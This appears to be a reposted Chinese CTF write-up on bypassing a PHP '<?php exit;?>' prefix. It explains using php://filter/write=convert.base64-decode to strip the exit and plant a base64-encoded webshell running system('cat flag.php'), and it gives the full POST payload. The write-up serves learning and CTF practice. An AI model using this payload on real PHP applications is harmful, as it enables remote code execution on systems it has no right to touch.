PHP代码审计(死亡退出)
2018-02-13 10:23
1421 查看
代码:
大体分析代码意思为post一个字符串和一个文件名然后将字符串与给的字符串连接后写入tmp.php文件中
先看
这里的
我们可以使用 php://filter/write=convert.base64-decode 来首先对其解码。在解码的过程中,字符<、?、;、>、空格等一共有7个字符不符合base64编码的字符范围将被忽略,所以最终被解码的字符仅有“phpexit”和我们传入的其他字符。“phpexit”一共7个字符,因为base64算法解码时是4个byte一组,所以给他增加1个“a”一共8个字符。这样,”phpexita”被正常解码,而后面我们传入的webshell的base64内容也被正常解码。结果就是
所以说我POST
拼接后c=
base64解码写入后就成了
所以最后POST如下即可获得flag
<?php
show_source(__FILE__);
$c="<?php exit;?>";
@$c.=$_POST['c'];
@$filename=$_POST['file'];
if(!isset($filename))
{
file_put_contents('tmp.php', '');
}
@file_put_contents($filename, $c);
include('tmp.php');
?>大体分析代码意思为post一个字符串和一个文件名然后将字符串与给的字符串连接后写入tmp.php文件中
先看
$c="<?php exit;?>";这句话会使php文件直接退出,不会执行后续代码,所以我们的目的是绕过这句话
这里的
$_POST['filename']是可以控制协议的,我们即可使用 php://filter协议的base64-decode方法来绕过exit这句话
我们可以使用 php://filter/write=convert.base64-decode 来首先对其解码。在解码的过程中,字符<、?、;、>、空格等一共有7个字符不符合base64编码的字符范围将被忽略,所以最终被解码的字符仅有“phpexit”和我们传入的其他字符。“phpexit”一共7个字符,因为base64算法解码时是4个byte一组,所以给他增加1个“a”一共8个字符。这样,”phpexita”被正常解码,而后面我们传入的webshell的base64内容也被正常解码。结果就是
<?php exit; ?>没有了。
所以说我POST
c=aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTsgPz4=
拼接后c=
<?php exit;?>aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTsgPz4=
base64解码写入后就成了
^ƫZ<?php system('cat flag.php'); ?>所以最后POST如下即可获得flag
c=aPD9waHAgc3lzdGVtKCdjYXQgZmxhZy5waHAnKTsgPz4=&file=php://filter/write=convert.base64-decode/resource=tmp.php
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 6.全局防护Bypass之一些函数的错误使用
- [PHP代码审计] -那些年我们一起挖掘SQL注入 - 1.什么都没过滤的入门情况-学习笔记
- PHP代码审计教程
- iis7.5 php进程意外退出,错误代码 0xfffffffe
- PHP最彻底的退出登录,清除session、cookie的代码
- 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 7.全局防护盲点的总结上篇
- php漏洞与代码审计
- 【转】PHP代码审计
- PHP代码审计片段讲解(入门代码审计、CTF必备)
- PHP代码审计
- iis7.5 php进程意外退出,错误代码 0xfffffffe
- 【PHP代码审计】 那些年我们一起挖掘SQL注入 - 8.全局防护盲点的总结下篇
- PHP简单登录退出代码
- 一个CMS案例实战讲解PHP代码审计入门
- PHP代码审计
- 浅谈PHP自动化代码审计技术
- 代码审计:php://filter在php漏洞中的利用
- CTF常见php猥琐小段代码审计
- php漏洞挖掘与代码审计方法
- PHP代码审计系统—RIPS